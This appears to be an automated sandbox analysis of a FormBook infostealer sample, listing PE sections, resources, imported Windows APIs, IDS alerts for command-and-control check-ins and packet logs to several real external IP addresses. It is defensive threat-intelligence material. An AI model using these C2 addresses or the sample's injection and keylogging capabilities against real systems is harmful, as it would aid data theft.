IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x130000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afbdb16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x5b8cc | 0x5ba00 | 97987a321615054496f8d9523e853b4e | False | 0.9277903308321964 | data | 7.894938427826124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x130000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x52b91 | data | | | 1.000327595009931
RT_GROUP_ICON | 0x12f34c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12f3c4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x12f3d8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12f3ec | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12f400 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12f4dc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T07:50:35.888894+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49740 | 154.215.72.110 | 80 | TCP
2024-12-19T07:51:09.555891+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49819 | 116.50.37.244 | 80 | TCP
2024-12-19T07:52:32.960227+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49877 | 85.159.66.93 | 80 | TCP
2024-12-19T07:52:47.659862+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | TCP
2024-12-19T07:53:11.238787+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | TCP
2024-12-19T07:53:26.602852+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | TCP
2024-12-19T07:53:57.895694+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                          Dec 19, 2024 07:51:04.232198000 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:04.242975950 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.262372971 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.381961107 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:05.382088900 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.384725094 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.504235029 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:05.504322052 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890149117 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890203953 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890256882 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:06.899158001 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:07.917306900 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.037133932 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:08.037256956 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.038743973 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.158267021 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555674076 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555740118 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555891037 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:09.558384895 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:09.677963018 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:23.534882069 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.654634953 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:23.654927969 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.667551041 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.787239075 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:25.180584908 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:25.300689936 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:25.300762892 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.199851990 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.319534063 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:26.319621086 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.321504116 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.441028118 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:27.836663008 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:27.956583023 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:27.956711054 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.865354061 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.984965086 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:28.985039949 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.988245010 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:29.108010054 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:29.108035088 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:30.493175030 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:30.613472939 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:30.613564014 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.513501883 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.633173943 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:31.633248091 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.635165930 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.754745007 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.959995985 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.960133076 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.960227013 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:52:32.963148117 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:52:33.082586050 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:38.266813040 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.386357069 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:38.386593103 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.389144897 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.508610010 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663331032 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663376093 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663494110 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:39.899411917 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:40.919177055 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.038856983 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:41.038944960 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.041213036 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.160806894 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.316906929 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.317409992 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.317465067 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:42.555305958 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.574702978 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.694307089 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:43.694415092 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.697117090 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.816837072 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:43.816926003 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972100973 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972208977 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972304106 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:45.211536884 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.233239889 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.352739096 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:46.353096962 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.354913950 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.474356890 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659691095 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659706116 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659785032 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659822941 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659835100 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659862041 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659895897 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659909010 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659919977 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659919024 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659931898 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659944057 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659990072 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.660079002 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.660129070 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.779443979 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.779495955 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.779608965 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.851978064 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.852091074 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.852196932 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.856194019 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.856282949 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.856379032 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.864695072 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.864835024 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.864938974 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.872924089 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.873030901 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.873130083 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.881345034 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.881472111 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.884533882 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:48.004040003 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:53:01.712308884 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.831952095 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:01.832292080 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.863102913 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.982615948 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071779966 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071840048 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071968079 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:03.367806911 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.386718035 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.506233931 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:04.506351948 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.508168936 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.627672911 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739797115 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739833117 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739892960 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:06.024040937 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.043262005 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.364058971 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:07.364216089 CET4999180192.168.2.566.29.149.46
